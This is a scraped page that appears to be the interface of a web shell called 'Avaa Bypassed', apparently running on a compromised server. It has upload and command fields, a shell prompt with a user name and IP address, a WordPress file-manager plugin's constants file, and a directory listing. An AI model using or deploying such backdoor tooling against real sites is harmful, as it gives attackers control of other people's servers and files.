[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.147.8.200: ~ $
<?php
if ( ! defined( 'ABSPATH' ) ) exit;
/**
 * File Manager Version
 */
if ( !defined('FMA_VERSION') ) {
   define('FMA_VERSION', '5.2.7');
}
/**
 * File Manager UI
 */
if ( !defined('FMA_UI') ) {
   define('FMA_UI', ['toolbar', 'tree', 'path', 'stat']);
}
/**
 * File Manager path
 */
if ( !defined('FMAFILEPATH') ) {
   define('FMAFILEPATH', plugin_dir_path( __FILE__ ));
}
/**
 * File Manager Operations
 */
if ( !defined('FMA_OPERATIONS') ) {
    define('FMA_OPERATIONS', ['mkdir', 'mkfile', 'rename', 'duplicate', 'paste', 'ban', 'archive', 'extract', 'copy', 'cut', 'edit','rm','download', 'upload', 'search', 'info', 'help','empty','resize','preference']);
}

Filemanager

Name Type Size Permission Actions
application Folder 0755
languages Folder 0755
constants.php File 667 B 0644
file_manager_advanced.php File 1022 B 0644
index.php File 32 B 0644
readme.txt File 8.84 KB 0644